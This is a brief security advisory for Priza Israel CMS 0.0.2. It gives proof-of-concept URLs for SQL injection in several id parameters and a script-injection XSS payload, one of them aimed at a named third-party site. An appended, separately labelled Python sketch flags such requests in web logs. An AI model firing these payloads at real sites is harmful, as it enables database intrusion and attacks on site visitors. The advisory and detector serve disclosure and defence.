Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability
Author: BHG Security Center
Software link: http://www.priza.co.il/
Affected version: [0.0.2]
Tested on: ubuntu 11.04
Discovered by:
 - Net.Edit0r (Net.edit0r [at] att [dot] net)
 - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
---------------------------------------------------------------------------
PoC/Exploit:
~~~~~~~~~~
~ [PoC] ~: /website_path/index.asp?p_id=201&id=[SQLi]
~ [PoC] ~: /website_path/index.asp?page_id=[SQLi]
~ [PoC] ~: /website_path/volumes.asp?id=18
~ [PoC] ~: /website_path/index.asp?action=find&page_id=28&string=[Xss]
~~~~~~~~
Test:
~ [PoC] ~: Http://www.2cto.com/path/index.asp?p_id=201&id=[SQLi]
~ [PoC] ~: Http://www.2cto.com/path/index.asp?action=find&page_id=28&string="><script>alert(0)</script>
-------------------------------- [ EOF ] ----------------------------------
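Detection sketch for the parameters listed above, added here as an example and not part of the original advisory: it reviews web access logs for requests to index.asp / volumes.asp whose p_id, id or page_id is not a plain integer, or whose string parameter carries markup characters. Assumptions: the id parameters are numeric in normal use (the advisory's own sample values are 201, 18 and 28), the log is in Apache/IIS-style combined format, and all function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory lists as injectable; ASSUMED numeric because the
# advisory's own sample values (201, 18, 28) are integers.
NUMERIC_PARAMS = {"p_id", "id", "page_id"}
# Parameter the advisory lists as reflected (XSS) on the "find" action.
TEXT_PARAMS = {"string"}
SCRIPTS = {"index.asp", "volumes.asp"}
DIGITS = re.compile(r"[0-9]+")
MARKUP = re.compile(r"[<>\"']")
# Greedy match so a target containing raw spaces is still captured whole.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+) HTTP/[\d.]+"')

def check_request(target):
    """Return (param, reason) findings for one request target."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1].lower() not in SCRIPTS:
        return []
    findings = []
    # parse_qsl percent-decodes once, matching what the application receives.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        key = name.lower()
        if key in NUMERIC_PARAMS and not DIGITS.fullmatch(value):
            findings.append((key, "non-numeric value"))
        elif key in TEXT_PARAMS and MARKUP.search(value):
            findings.append((key, "markup characters"))
    return findings

def scan(lines):
    """Yield (line_number, findings) for log lines that need review."""
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        found = check_request(m.group(1)) if m else []
        if found:
            yield n, found

# Constructed sample log lines (not taken from the advisory).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2012:10:00:00 +0000] "GET /site/index.asp?p_id=201&id=7 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2012:10:00:05 +0000] "GET /site/index.asp?p_id=201&id=7%27 HTTP/1.1" 500 310',
    '192.0.2.12 - - [01/Jan/2012:10:00:09 +0000] "GET /site/index.asp?action=find&page_id=28&string=%22%3E%3Cb%3E HTTP/1.1" 200 4100',
    '192.0.2.13 - - [01/Jan/2012:10:00:12 +0000] "GET /site/volumes.asp?id=18 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, found in scan(SAMPLE):
        print(n, found)
```

The same integer-only rule is what the application itself should enforce on these parameters before they reach a query, with the string value HTML-encoded on output.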